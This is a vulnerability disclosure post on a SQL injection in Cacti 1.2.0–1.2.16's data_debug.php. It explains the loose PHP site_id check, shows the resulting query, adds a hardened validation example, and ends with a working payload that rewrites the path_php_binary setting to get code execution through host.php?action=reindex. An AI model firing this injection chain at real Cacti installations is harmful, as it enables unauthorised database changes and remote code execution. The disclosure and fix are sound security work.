Cacti 1.2.0 to 1.2.16 SQL Injection

This one is pretty straightforward and was found pretty quickly.

An SQL injection in the latest version of Cacti (1.2.16 at the time of writing).

In order to trigger the vulnerability you just need to request this URL: cacti/data_debug.php?action=ajax_hosts&site_id=11SQLInjection

Because of how PHP compares a string with a number, the check:

if (get_request_var('site_id') > 0) {
    $sql_where = 'site_id = ' . get_request_var('site_id');
}

will pass whenever the parameter starts with a number, the unvalidated string is concatenated straight into $sql_where, and in the end the system will try to execute the following query:

SELECT h1.*
FROM host AS h1
INNER JOIN (SELECT DISTINCT id
FROM (SELECT h.*, uap0.user_id AS user0, uap1.user_id AS user1, uap2.user_id AS user2
FROM host AS h
LEFT JOIN graph_local AS gl ON h.id = gl.host_id
LEFT JOIN graph_templates_graph AS gtg ON gl.id = gtg.local_graph_id
LEFT JOIN graph_templates AS gt ON gt.id = gl.graph_template_id
LEFT JOIN host_template AS ht ON h.host_template_id = ht.id
LEFT JOIN user_auth_perms AS uap0
ON (gl.id = uap0.item_id AND uap0.type = 1 AND uap0.user_id = 1)
LEFT JOIN user_auth_perms AS uap1
ON (gl.host_id = uap1.item_id AND uap1.type = 3 AND uap1.user_id = 1)
LEFT JOIN user_auth_perms AS uap2
ON (gl.graph_template_id = uap2.item_id AND uap2.type = 4 AND
uap2.user_id = 1)
WHERE site_id = 11sql_injection) AS rs1) AS rs2 ON rs2.id = h1.id;
select 1 # AND hostname LIKE '%hostname%' OR description LIKE '%description%' OR notes LIKE '%notes%' AND h.disabled=""
HAVING (user0 IS NULL OR (user1 IS NULL OR user2 IS NULL)) ) AS rs1 ) AS rs2
ON rs2.id=h1.id
ORDER BY description LIMIT 30
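To make the PHP behaviour concrete, here is an added example (not Cacti's code, and not part of the original post) that puts the loose check quoted above next to a hardened one. get_request_var() is replaced by a stub that reads from an array so the script runs stand-alone; the sample inputs are constructed, and the query fragment with a bound parameter is only illustrated, no database is touched:

```php
<?php
// Added example: the loose "> 0" check from the post beside a strict version.
// Assumption: request values arrive as strings, as they do in $_REQUEST.

// Stand-in for Cacti's get_request_var() (stub for this example only).
function get_request_var_stub(array $request, string $name): ?string {
    return $request[$name] ?? null;
}

// The check as described in the post: a loose comparison on the raw string.
// Returns the WHERE fragment that would be concatenated, or null if the check fails.
// PHP 7 casts "11SQLInjection" to its numeric prefix 11; PHP 8 casts the 0 to "0"
// and compares the two as strings. Either way a leading-digit string passes.
function vulnerable_where(array $request): ?string {
    $site_id = get_request_var_stub($request, 'site_id');
    if ($site_id > 0) {
        return 'site_id = ' . $site_id;   // raw request string lands in the SQL
    }
    return null;
}

// Hardened variant: validate as a positive integer first, then bind it.
// Returns [fragment_with_placeholder, params] or null when validation fails.
function hardened_where(array $request): ?array {
    $raw = get_request_var_stub($request, 'site_id');
    if ($raw === null) {
        return null;
    }
    $site_id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($site_id === false) {
        return null;                       // "11SQLInjection", "abc", "0", "-3" all rejected
    }
    return ['site_id = ?', [$site_id]];    // placeholder plus the integer to bind
}

// Constructed inputs: a valid id, the post's payload prefix, and a few edge cases.
$samples = ['7', '11SQLInjection', '0', 'abc', '-3'];
foreach ($samples as $s) {
    $req = ['site_id' => $s];
    printf("%-18s vulnerable: %-28s hardened: %s\n",
        json_encode($s),
        json_encode(vulnerable_where($req)),
        json_encode(hardened_where($req)));
}
```

Running it with `php` on the command line shows '7' and '11SQLInjection' both surviving the vulnerable check while only '7' survives the hardened one. From memory of the code base rather than from this post, Cacti also ships a get_filter_request_var() helper that applies FILTER_VALIDATE_INT by default, which is the natural replacement for get_request_var() on any parameter that is meant to be an integer; whichever validator is used, the value should then be bound as a parameter rather than concatenated.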

If we execute something like this: cacti/data_debug.php?action=ajax_hosts&site_id=11) AS rs1   ) AS rs2   ON rs2.id=h1.id;update settings set value='php -r "file_put_contents(\'/tmp/a\',\'aaa\'); "' where name='path_php_binary';-- -

we will manage to execute code when we visit /cacti/host.php?action=reindex
